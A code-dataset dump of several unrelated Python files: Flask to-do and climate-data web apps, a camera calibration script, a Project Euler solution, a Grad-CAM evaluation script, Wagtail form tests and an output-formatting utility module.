Weekly(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n item = db.Column(db.String(100), nullable=False)\n\n\nclass Monthly(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n item = db.Column(db.String(100), nullable=False)\n\n\nclass Yearly(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n item = db.Column(db.String(100), nullable=False)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef daily():\n\n today = now.strftime(\"%A, %B %d\")\n\n if request.method == \"POST\":\n post_item = request.form[\"item\"]\n new_item = Daily(item=post_item)\n db.session.add(new_item)\n db.session.commit()\n return redirect(\"/\")\n\n else:\n daily_list = Daily.query.order_by(Daily.id).all()\n return render_template(\"daily.html\", today=today, lists=daily_list)\n\n\n@app.route(\"/daily/delete/\")\ndef daily_delete(id):\n post = Daily.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/\")\n\n\n@app.route(\"/weekly\", methods=[\"GET\", \"POST\"])\ndef weekly():\n\n if request.method == \"POST\":\n post_item = request.form[\"item\"]\n new_item = Weekly(item=post_item)\n db.session.add(new_item)\n db.session.commit()\n return redirect(\"/weekly\")\n else:\n weekly_list = Weekly.query.order_by(Weekly.id).all()\n return render_template(\"weekly.html\", lists=weekly_list)\n\n\n@app.route(\"/weekly/delete/\")\ndef weekly_delete(id):\n\n post = Weekly.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/weekly\")\n\n\n@app.route(\"/monthly\", methods=[\"GET\", \"POST\"])\ndef monthly():\n\n month = now.strftime(\"%B\")\n\n if request.method == \"POST\":\n post_item = request.form[\"item\"]\n new_item = Monthly(item=post_item)\n db.session.add(new_item)\n db.session.commit()\n return redirect(\"/monthly\")\n\n else:\n monthly_list = Monthly.query.order_by(Monthly.id).all()\n return render_template(\"monthly.html\", month=month, lists=monthly_list)\n\n\n@app.route(\"/monthly/delete/\")\ndef monthly_delete(id):\n\n post = Monthly.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/monthly\")\n\n\n@app.route(\"/yearly\", methods=[\"GET\", \"POST\"])\ndef yearly():\n\n year = now.strftime(\"%Y\")\n\n if request.method == \"POST\":\n post_item = request.form[\"item\"]\n new_item = Yearly(item=post_item)\n db.session.add(new_item)\n db.session.commit()\n return redirect(\"/yearly\")\n\n else:\n yearly_list = Yearly.query.order_by(Yearly.id).all()\n return render_template(\"yearly.html\", year=year, lists=yearly_list)\n\n\n@app.route(\"/yearly/delete/\")\ndef yearly_delete(id):\n\n post = Yearly.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/yearly\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"407336530","text":"import numpy as np\nimport cv2\nimport glob\nimport codecs, json\n\ncalibration_flags = cv2.fisheye.CALIB_RECOMPUTE_EXTRINSIC+cv2.fisheye.CALIB_CHECK_COND+cv2.fisheye.CALIB_FIX_SKEW\n\n# termination criteria\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1)\n\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((1, 6*8, 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:8,0:6].T.reshape(-1,2)\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\n# images = glob.glob('chessboard_*')\nimages = glob.glob('vlc*.png')\n\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (8,6), corners2, ret)\n cv2.imshow('img',img)\n cv2.waitKey(500)\n\ncv2.destroyAllWindows()\n\nN_OK = len(objpoints)\nK = np.zeros((3, 3))\nD = np.zeros((4, 1))\nrvecs = [np.zeros((1, 1, 3), dtype=np.float64) for i in range(N_OK)]\ntvecs = [np.zeros((1, 1, 3), dtype=np.float64) for i in range(N_OK)]\n\n# get calibration parameters\nret, _, _, _, _ = cv2.fisheye.calibrate(objpoints, imgpoints, gray.shape[::-1], K, D, rvecs, tvecs, calibration_flags, (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 1e-6))\n\n# save calibration parameters\n\nparams = {\n \"K\": K.tolist(),\n \"D\": D.tolist()\n}\n\nfile_path = \"params.json\"\nwith open(file_path, 'w') as f:\n json.dump(params, f, indent=2)\n\nprint(\"Successfully output to the file: params.json !\")\n\n\n# Re-projection Error\n#mean_error = 0\n#for i in xrange(len(objpoints)):\n# imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n# error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n# mean_error += error\n#\n#print \"mean error: \", mean_error/len(objpoints)\n\n","sub_path":"B002/calibration_fisheye.py","file_name":"calibration_fisheye.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"200641561","text":"'''\nIt can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.\n\nFind the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.\n'''\nf = lambda n:sorted(str(n))\nn = 1000\nkeep = True\nwhile keep:\n\tn = n +1\n\tif f(n*2)==f(n*3)==f(n*4)==f(n*5)==f(n*6):\n\t\tkeep = False\nprint(n)\n'''\n142857\n[Finished in 2.1s]\n'''","sub_path":"problem52.py","file_name":"problem52.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"270321780","text":"#!/usr/bin/env python2\nimport path\nimport os.path\nimport shutil\npathname = '/home/hwj/'\ntxtname = os.path.join(pathname,'test_surveillance.txt')\n#traindir = os.path.join(pathname,'val')\n#imagedir = os.path.join(pathname,'image')\nk = open(os.path.join(pathname,'test.txt'),'w')\nnum =[]\nnum2=[]\n\nwith open(txtname,'r') as f:\n for line in f.readlines():\n line = line.strip().split('/')\n \n #num.append(line)\n str_=line[1] + ' '+line[0]+'\\n' \n num.append(str_)\n k.writelines(str_)\n #print(os.path.join(traindir,line[1]))\n #print(os.path.join(imagedir,line[0], line[1]))\n #open(os.path.join(traindir,line[1]), \"wb\").write(open(os.path.join(imagedir,line[0], line[1]),\"rb\").read())\nprint(len(num))\n\nnum1 = os.listdir('/home/hwj/test')\nprint(len(num1))","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"572569752","text":"import utils.arg_parser\nimport torch\nimport torch.nn.functional as F\nfrom models.model_loader import ModelLoader\nfrom train.trainer_loader import TrainerLoader\nfrom utils.data.data_prep import DataPreparation\nimport utils.arg_parser\nfrom utils.misc import get_split_str\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom scipy.interpolate import interp2d\nfrom collections import namedtuple\nimport torchvision.transforms as transforms\n\n# Read bounding boxes data\nBBox = namedtuple('BBox', ['x', 'y', 'width', 'height'])\nnum2id = {}\nwith open('data/cub/CUB_200_2011/images.txt') as file:\n for line in file:\n values = line.split()\n num2id[values[0]] = values[1]\nid2box = {}\nwith open('data/cub/CUB_200_2011/bounding_boxes.txt') as file:\n for line in file:\n values = line.split()\n id2box[num2id[values[0]]] = BBox(*[int(float(x)) for x in values[1:]])\n\n# Get default arguments\nargs = utils.arg_parser.get_args()\n\n# Overwrite required args\nargs.model = 'gve'\nargs.dataset = 'cub'\nargs.pretrained_model = 'vgg16'\nargs.num_epochs = 1\nargs.batch_size = 1\n# set to train because we need gradients for Grad-CAM\nargs.train = True\nargs.eval_ckpt = 'data/vgg-ic-gve-best-ckpt.pth'\nargs.ic_ckpt = 'data/cub/image_classifier_ckpt.pth'\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# Data preparation\nprint(\"Preparing Data ...\")\nsplit = get_split_str(args.train, bool(args.eval_ckpt), args.dataset)\nsplit = 'test'\ndata_prep = DataPreparation(args.dataset, args.data_path)\ndataset, data_loader = data_prep.get_dataset_and_loader(split, args.pretrained_model,\n batch_size=args.batch_size, num_workers=args.num_workers)\n\n# Load VGE model\nprint(\"Loading Model ...\")\nml = ModelLoader(args, dataset, device)\nmodel = getattr(ml, args.model)()\nprint(model, '\\n')\nprint(\"Loading Model Weights ...\")\nevaluation_state_dict = torch.load(args.eval_ckpt, map_location='cpu')\nmodel_dict = model.state_dict(full_dict=True)\nmodel_dict.update(evaluation_state_dict)\nmodel.load_state_dict(model_dict)\n# Disable dropout and batch normalization\nmodel.eval()\n# The model actually has a vision model but we need to\n# probe the feature extraction process\nmodel.has_vision_model = False\nvgg_feat_layers = model.image_classifier.vision_model.pretrained_model.features\nvgg_class_layers = None\n\nvisual = np.zeros((224, 224))\n\n# Grad-CAM\ndef process_fmap_grad(grad):\n print('Called hook! Gradient has shape', grad.shape)\n # Extract single feature map gradient from batch\n fmap_grad = grad[0]\n # and compute global average\n a_k = fmap_grad.mean(dim=-1).mean(dim=-1)\n grad_cam = F.relu(torch.sum(a_k[:, None, None] * fmap_grad, dim=0)).data.numpy()\n\n nx, ny = grad_cam.shape\n x = np.linspace(0, 224, nx, endpoint=False)\n y = np.linspace(0, 224, ny, endpoint=False)\n f = interp2d(x, y, grad_cam)\n xx = np.linspace(0, 224, 224, endpoint=False)\n yy = np.linspace(0, 224, 224, endpoint=False)\n visual[:] = f(xx, yy)\n\n print('Done')\n\ndef get_features_labels(image_input):\n # Forward pass until layer 28\n for i in range(29):\n image_input = vgg_feat_layers[i](image_input)\n features = image_input\n features.register_hook(process_fmap_grad)\n\n # Finish forward pass\n for i in range(29, len(vgg_feat_layers)):\n features = vgg_feat_layers[i](features)\n # Compact bilinear pooling\n features = model.image_classifier.cbp(features)\n # Element-wise signed square root layer and L2 normalization\n features = torch.sign(features) * torch.sqrt(torch.abs(features) + 1e-12)\n features = torch.nn.functional.normalize(features, dim=-1)\n\n logits = model.image_classifier.linear(features)\n _, labels = torch.max(logits.data, 1)\n\n return features, labels\n\n# The trainer already provides a method to extract an explanation\ntrainer_creator = getattr(TrainerLoader, args.model)\ntrainer = trainer_creator(args, model, dataset, data_loader, logger=None, device=device)\n\ntransform = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor()])\nimages_path = 'data/cub/images/'\ngrad_fractions = []\nfor i, (image_input, word_inputs, word_targets, lengths, ids, *excess) in enumerate(data_loader):\n raw_image = Image.open(os.path.join(images_path, ids[0]))\n bbox_np = np.zeros((raw_image.size[1], raw_image.size[0], 3), dtype=np.uint8)\n bbox = id2box[ids[0]]\n bbox_np[bbox.y: bbox.y + bbox.height, bbox.x: bbox.x + bbox.width, :] = 255\n bbox_np = transform(Image.fromarray(bbox_np)).data.numpy().sum(axis=0)\n bbox_np[bbox_np > 0] = 1\n\n # Enable for Grad-CAM\n image_input.requires_grad = True\n\n # Get feature maps from the conv layer, and final features\n features, label = get_features_labels(image_input)\n features.retain_grad()\n # Generate explanation\n outputs, log_probs = model.generate_sentence(features, trainer.start_word, trainer.end_word, label)\n explanation = ' '.join([dataset.vocab.get_word_from_idx(idx.item()) for idx in outputs][:-1])\n\n # Plot results\n np_image = image_input.squeeze().permute(1, 2, 0).data.numpy()\n np_image = np_image - np.min(np_image)\n np_image = np_image * 255 / np.max(np_image)\n np_image = np_image.astype(np.uint8)\n #image = Image.fromarray(np_image)\n #plt.figure(figsize=(15, 15))\n #plt.imshow(image)\n #plt.contour(bbox_np)\n #plt.title(explanation)\n #plt.axis('off')\n #plt.show()\n\n masks = np.zeros((224, 224, len(log_probs)))\n visual = np.zeros((224, 224))\n model.zero_grad()\n log_probs.sum().backward()\n\n mask = visual\n mask = np.clip(mask, 0, np.max(mask))\n mask = mask/np.max(mask)\n # Mask the image\n masked = (mask[..., np.newaxis] * np_image).astype(np.uint8)\n #plt.figure(figsize=(15, 15))\n #plt.imshow(masked)\n #plt.contour(bbox_np)\n #plt.axis('off')\n\n fraction = 1 - np.sum(mask - (bbox_np * mask)) / mask.sum()\n grad_fractions.append(fraction)\n #plt.title('{:.1f}% of gradient within box'.format(percentage * 100))\n print('[{:d}/{:d}]'.format(i+1, len(dataset.coco.imgs)))\n print('mean = {:.6f}\\nstd = {:.6f}'.format(np.mean(grad_fractions),\n np.std(grad_fractions)))\n\n #plt.show()\nprint('Gradient-to-box ratio')\nprint('mean = {:.6f}\\nstd = {:.6f}'.format(np.mean(grad_fractions),\n np.std(grad_fractions)))\n\n","sub_path":"gradcam_eval.py","file_name":"gradcam_eval.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"362687039","text":"## Python实现两个Excel间的数据查找\n#data1.xlsx为遍历数据,data2.xlsx为扫描数据库\n#程序执行结果保存在DxDy.xlsx文件中\n# %%\nimport pandas as pd\nimport numpy as np\n\ndata1=pd.read_excel('data1.xlsx')\ndata2=pd.read_excel('data2.xlsx')\n# %%\ndata1=np.array(data1)\ndata2=np.array(data2)\n# %%\ndata1=np.reshape(data1,[121,1])\ndata1=data1.tolist()\n# %%\nm=data2.shape[0]\nn=data2.shape[1]\n# %%\ndata=[]\na=[]\nb=[]\nfai=[0 for _ in range(121)]\nji=0\nfor item in data1:\n p=0\n q=0\n l=np.abs(data2[p][q]-item)\n fai[ji]=data2[p][q]\n for x in range(m):\n for y in range(n):\n distance=np.abs(data2[x][y]-item)\n if distance 0 and pr[i] < 0:\n tt1.extend([t[i]])\n xx1.extend([x[i]])\n\n yinterp1 = scipy.interpolate.interp1d(xx1,tt1)\n t = yinterp1(xvals)\n\n\n return t\n\n\nx0 = 10 # x coord to evaluate t coord at\nlower = -20 #define range of impact params\nupper = 20\n\nimpacts1 = []\ndelta_t1 = []\n\n\nimpacts2 = []\ndelta_t2 = []\n\nimpacts3 = []\ndelta_t3 = []\n\nfor i in range(lower,upper+1):\n \n if abs(i) < 10:\n j = '0'+str(abs(i))\n else:\n j = str(abs(i))\n\n\n if i <= 0:\n j = '+'+j\n\n else:\n j = '-'+j\n\n\n print (j)\n base_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/vacuum/base'+j+'*.txt')\n print (base_files)\n base_file = base_files[0]\n \n plasma_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/*_x='+j+'*.txt')\n\n t_base = plotPHOTON(base_file)\n \n xx = []\n yy = []\n\n for file in plasma_files:\n t = plotPHOTON(file)\n dt = abs(t_base - t)\n dt=dt*factor # milliseconds\n\n #ax1.plot(xvals, dt)\n E_id = file[-5:-4]\n \n\n if E_id == '1':\n impacts1.extend([float(j)])\n delta_t1.extend([dt[0]])\n # ax1.plot(xvals, dt)\n\n if E_id == '2':\n impacts2.extend([float(j)])\n delta_t2.extend([dt[0]])\n # ax2.plot(xvals, dt)\n\n\n if E_id == '3':\n impacts3.extend([float(j)])\n delta_t3.extend([dt[0]])\n # ax3.plot(xvals, dt)\n\n\nax1.scatter(impacts1,delta_t1, c='tab:red')\nax1.scatter(impacts2,delta_t2, c='tab:green')\nax1.scatter(impacts3,delta_t3, c='tab:blue')\n\n\nax1.plot(impacts1,delta_t1, c='tab:red')\nax1.plot(impacts2,delta_t2, c='tab:green')\nax1.plot(impacts3,delta_t3, c='tab:blue')\n#Plot details\n#ax3.set_xlabel(r'x [$r_g$]', fontsize = 18)\n\nax1.set_ylabel(r'$\\delta t / P$', fontsize = 18)\n#ax2.set_ylabel(r'$\\delta t / P$', fontsize = 18)\n#ax3.set_ylabel(r'$\\delta t / P$', fontsize = 18)\nax1.set_xlabel(r'$\\alpha \\, [r_g]$', fontsize = 18)\n#ax2.set_yscale('log')\n\n#ax1.get_xaxis().set_visible(False)\n#ax2.get_xaxis().set_visible(False)\n#ax1.set_xlim(45,50)\n#ax1.set_ylim(0.035,0.05)\n#plt.xlabel(r'$\\alpha$[rg]')\n#plt.ylabel(r'$\\delta t / P$')\n#plt.axhline(0.0, c='0.8', linestyle = '--')\nplt.show()\n\n\n","sub_path":"Tools/temporal_dispersion.py","file_name":"temporal_dispersion.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"261949323","text":"\"\"\"\ntest_wagtailformblocks\n----------------------------------\n\nTests for `wagtailformblocks` module.\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport json\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom wagtailformblocks.models import (BaseForm, EmailForm, FormField,\n FormSubmission)\n\n\ndef make_formfields(form):\n FormField.objects.create(\n form=form,\n sort_order=1,\n label=\"Your email\",\n field_type='email',\n required=True,\n )\n\n FormField.objects.create(\n form=form,\n sort_order=2,\n label=\"Your message\",\n field_type='multiline',\n required=True,\n )\n\n FormField.objects.create(\n form=form,\n sort_order=3,\n label=\"Your choices\",\n field_type='checkboxes',\n required=False,\n choices='foo,bar,baz',\n )\n\n\ndef get_json(response):\n if hasattr(response, 'json'): # Django >= 1.9\n return response.json()\n try:\n return json.loads(response.content)\n except TypeError:\n # Happens when response.content is of type bytes (Python 3)\n return json.loads(response.content.decode())\n\n\nclass TestViews(TestCase):\n def setUp(self):\n self.baseform = BaseForm.objects.create()\n self.emailform = EmailForm.objects.create()\n make_formfields(self.emailform)\n\n def tearDown(self):\n pass\n\n def test_process(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.baseform.id})\n data = {}\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n json_resp = get_json(resp)\n self.assertEqual(json_resp['message'],\n 'Thank you, the form has been submitted.')\n\n def test_process_form_validation(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.emailform.id})\n data = {}\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 400)\n\n json_resp = get_json(resp)\n self.assertEqual(json_resp['message'],\n 'There was an error processing the form')\n\n data = {\n 'your-email': 'john@doe.com',\n 'your-message': 'This is a test message'\n }\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n\n def test_process_form_store_submission(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.emailform.id})\n data = {\n 'your-email': 'john@doe.com',\n 'your-message': 'This is a test message'\n }\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(FormSubmission.objects.count(), 0)\n\n self.emailform.store_submission = True\n self.emailform.save()\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(FormSubmission.objects.count(), 1)\n","sub_path":"tests/test_wagtailformblocks.py","file_name":"test_wagtailformblocks.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"433103232","text":"#!/usr/bin/env python3\n\n# Copyright 2014 SolidFire, Inc. All rights reserved.\n#\n# A library of classes and functions for handling common parameters, output modes and more.\n#\n\nimport argparse\nimport json\nimport logging\nimport os\nimport shutil\nimport string\nimport sys\nfrom collections import MutableMapping\nfrom datetime import datetime, timedelta\nfrom re import match\n\n# Make sure we are in Python3+\nif sys.version_info[0] <= 2:\n mesg = \"common.ioutils -- is incompatibile with Python2\"\n sys.stderr.write(mesg + '\\n')\n raise ImportError(mesg)\n\n\nclass DateTimeParser(object):\n \"\"\"Parser for datetime.datetime objects, for use with an arparse.ArgumentParser\n\n Allowed formats:\n YYYY-MM-DD Uses time 00:00:00 by default; see 'end' parameter.\n YYYY-MM-DD'T'HH:MM:SS As expected\n YYYY-MM-DD'T'HH:MM:SS.NNNNNN As expected.\n [-+]NUM{'days','hours'} Offset time.\n\n Constructor parameters:\n end = if true then use the end of the day if no time is specified.\n base = a datetime.datetime from which the offset time is applied.\"\"\"\n def __init__(self, end=False, base=None):\n self.end = end\n self.base = base or datetime.now()\n\n @staticmethod\n def add_parser_args(parser, after=True, before=True, prefix='', extra='events'):\n fmt = ('Restrict query to {} at or {} a UTC time; YYYY-MM-DD[\"T\"HH:MM:SS[.NNNNNN]\"Z\"]' +\n ' If time of day is omitted, it defaults to midnight at the {} of the given day.' +\n ' (default: %(default)s)')\n if before:\n tag = '--{}before'.format(prefix)\n parser.add_argument(tag, metavar='ENDTIME', help=fmt.format(extra, 'before', 'end'),\n type=DateTimeParser(True), default=None if before is True else before)\n if after:\n tag = '--{}after'.format(prefix)\n parser.add_argument(tag, metavar='STARTIME', help=fmt.format(extra, 'after', 'start'),\n type=DateTimeParser(False), default=None if after is True else after)\n return parser\n\n @staticmethod\n def update_query(query, opts, parser, prefix='', throw=False):\n # Updates the MongoDB query for this timestamp.\n prefix = prefix.replace('-', '_')\n before = getattr(opts, prefix + 'before')\n after = getattr(opts, prefix + 'after')\n if not before and not after:\n return query\n\n key = '@timestamp'\n if key not in query:\n query[key] = {}\n if before:\n query[key]['$lte'] = before\n if after:\n query[key]['$gte'] = after\n\n if before and after and before < after:\n error = \"Invalid Time Range: specified ENDTIME ({}) was before STARTIME ({})\".format(before, after)\n if throw:\n raise ValueError(error)\n parser.error(error)\n\n return query\n\n def __call__(self, text):\n timeformat = ''\n for dateOnly, tfmt in ((1, '%Y-%m-%d'), (0, 'T%H:%M:%S'), (0, '.%f')):\n timeformat += tfmt\n for suff in ('', 'Z'):\n try:\n date = datetime.strptime(text, timeformat + suff)\n if dateOnly and self.end:\n date = datetime.combine(date, datetime.max.timetz())\n return date\n except ValueError:\n pass\n\n # Append \"s\" to allow non-plural input, eg: \"+1 week\"\n offset = match(\" *([-+]?[1-9][0-9]*(.[0-9][0-9]*)?) *(weeks|days|hours|minutes|seconds|microseconds)\", text.lower() + \"s\")\n if offset:\n param = {offset.group(3): float(offset.group(1))}\n return self.base + timedelta(**param)\n\n EPOCH = '([1-9][0-9]{9}(\\\\.[0-9]*)?)'\n for pattern in ('{} *epoch', '@{}', 'epoch *{}', '{}'):\n epoch = match(pattern.format(EPOCH), text.lower())\n if epoch:\n return datetime.utcfromtimestamp(float(epoch.group(1)))\n\n raise ValueError(\"Cannot parse time: \\\"{}\\\"\".format(text))\n\n\ndef write_to_file(filename, data, tmpsuffix='.tmp', backup='~', mode='w'):\n \"\"\"Safely overwrites FILENAME the ability to safely overwrite a file by creating a temporary and renaming.\"\"\"\n tempfile = filename + tmpsuffix\n try:\n with open(tempfile, mode) as outfd:\n outfd.write(data)\n if backup:\n shutil.copyfile(filename, filename + backup)\n os.rename(tempfile, filename)\n finally:\n try:\n os.remove(tempfile)\n except OSError:\n pass\n\n\nclass SpecialNoneFormatter(string.Formatter):\n \"\"\"Formatter to convert None into an empty (or other) string rather than the literal 'None'.\"\"\"\n class SpecialNoneType(object):\n def __init__(self, nullstr):\n self.nullstr = nullstr\n\n def __nonzero__(self):\n return False\n\n def __str__(self):\n return self.nullstr\n\n def __getattr__(self, name):\n return self\n\n def __getitem__(self, idx):\n return self\n\n def __init__(self, nullstr=\"\"):\n self.none = SpecialNoneFormatter.SpecialNoneType(nullstr)\n\n def get_value(self, field_name, args, kwds):\n v = string.Formatter.get_value(self, field_name, args, kwds)\n if v is None:\n return self.none\n if isinstance(v, str):\n for ch, esc in ('\"', '\"\"'), ('\\\\', '\\\\\\\\'), ('\\t', '\\\\t'), ('\\n', '\\\\n'), ('\\r', '\\\\r'):\n if ch in v:\n v = v.replace(ch, esc)\n v = '\"' + v + '\"'\n return v\n\n\nclass OutputMode(object):\n \"\"\"Supports output of JSON data in CSV, JSON or keyed text formats.\"\"\"\n def __init__(self, parser, separator='_', outfile=sys.stdout):\n self.parser = parser\n self.mode = 'text'\n self.first = True\n self.flatten = None\n self.separator = separator\n self.parser.add_argument('--out', help=\"Specify the filename in which to save the output.\",\n default=outfile, type=argparse.FileType('w'))\n group = self.parser.add_mutually_exclusive_group(required=False)\n group.add_argument('--text', help=argparse.SUPPRESS, dest='text', action='store_true')\n group.add_argument('--csv', help=argparse.SUPPRESS, dest='csv', action='store_true')\n group.add_argument('--json', help=argparse.SUPPRESS, dest='json', action='store_true')\n parser.add_argument('--none', dest='nullstr', help='Except in JSON output, replace null values ' +\n 'values with NULLSTR (default is an empty string)')\n group.add_argument('--mode', dest='mode', help='Output format, one of: [\"csv\", \"text\", \"json\"]; ' +\n ' Default is \"%(default)s\", or use just the name (eg: \"--csv\")', default='json')\n\n def _flatten(self, obj, key=None):\n items = []\n for k, v in obj.items():\n new_key = key + self.separator + k if key else k\n if isinstance(v, MutableMapping):\n items.extend(self._flatten(v, new_key).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\n def new_section(self):\n self.first = True\n return self\n\n def emit_line(self, opts, data, keys=None, flatten=None, new_data=False):\n if new_data or self.first:\n self.resolve_mode(opts)\n self.flatten = flatten if flatten is not None else (self.mode != 'json')\n self.out = opts.out\n\n datum = self._clean(data, self.flatten)\n if new_data or self.first:\n self.first = False\n self.keys = keys or sorted(datum.keys())\n\n if self.mode == 'json':\n self.func = lambda datum: json.dumps(datum) + \"\\n\"\n else:\n if self.mode == 'text':\n fmt = \" \".join([\"%s={%s}\" % (key.replace(self.separator, '.'), key) for key in self.keys]) + \"\\n\"\n else:\n self._write('\"' + ('\",\"'.join(self.keys)) + '\"\\n')\n fmt = \",\".join([\"{%s}\" % key for key in self.keys]) + \"\\n\"\n logging.debug('FMT: \"\"\"%s\"\"\"' % fmt)\n formatter = SpecialNoneFormatter(self.nullstr)\n self.func = lambda datum: formatter.format(fmt, **datum)\n self._write(self.func(datum))\n\n def emit(self, opts, data, keys=None, flatten=None):\n new_data = True\n assert isinstance(data, (tuple, list))\n for row in data:\n self.emit_line(opts, row, keys, flatten=flatten, new_data=new_data)\n new_data = False\n\n def resolve_mode(self, opts):\n if opts.mode:\n self.mode = opts.mode.lower()\n if self.mode not in ('text', 'csv', 'json'):\n self.parser.error(\"Invalid mode: --mode={}\".format(opts.mode))\n return\n if opts.text:\n self.mode = 'text'\n elif opts.csv:\n self.mode = 'csv'\n elif opts.json:\n self.mode = 'json'\n\n # Pick the nullstr from opts or from the mode default.\n self.nullstr = opts.nullstr\n if self.nullstr is None and self.mode in ('text', 'csv'):\n self.nullstr = ''\n else:\n assert self.nullstr or self.mode == 'json'\n logging.debug(\"NULLSTR({}) = [{}] '{}'\".format(self.mode, type(self.nullstr), self.nullstr))\n return self.mode\n\n def _clean(self, obj, flatten):\n if '@timestamp' in obj:\n del obj['@timestamp']\n return self._flatten(obj) if flatten else obj\n\n # Can be overridden for testing.\n def _write(self, output):\n self.out.write(output)\n","sub_path":"matilda_scripts/recorder/common/ioutils.py","file_name":"ioutils.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477278294","text":"import numpy as np\nimport datetime as dt\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n\n# Database Setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#Create our session from Python to the DB\nsession = Session(engine)\n\n# Flask Setup\napp = Flask(__name__)\n\n\n#Flask Routes\n@app.route(\"/\")\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/start
\"\n f\"/api/v1.0/start/end
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n \"\"\"Lets look into the precipitation data.\"\"\"\n #Query last 12 months prcp data\n precip_results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= year_earlier_date).group_by(Measurement.date).all()\n prcp_data = []\n for date, prcp in precip_results:\n prcp_dict = {}\n prcp_dict[\"date\"] = date\n prcp_dict[\"prcp\"] = prcp\n prcp_data.append(prcp_dict)\n return jsonify(prcp_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n stat_results = session.query(Station.station, Station.name).all()\n #stat_data = pd.read_sql(stat_results.statement, stat_results.session.bind)\n return jsonify(stat_results)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n #12 month earlier\n year_earlier_date = '2016-08-23'\n\n #Most active station\n most_active_stid = 'USC00519281'\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= year_earlier_date).filter(Measurement.station == most_active_stid).order_by(Measurement.tobs).all()\n return jsonify(tobs_results) \n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n session = Session(engine)\n temp1_results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\n session.close()\n return jsonify(temp1_results)\n 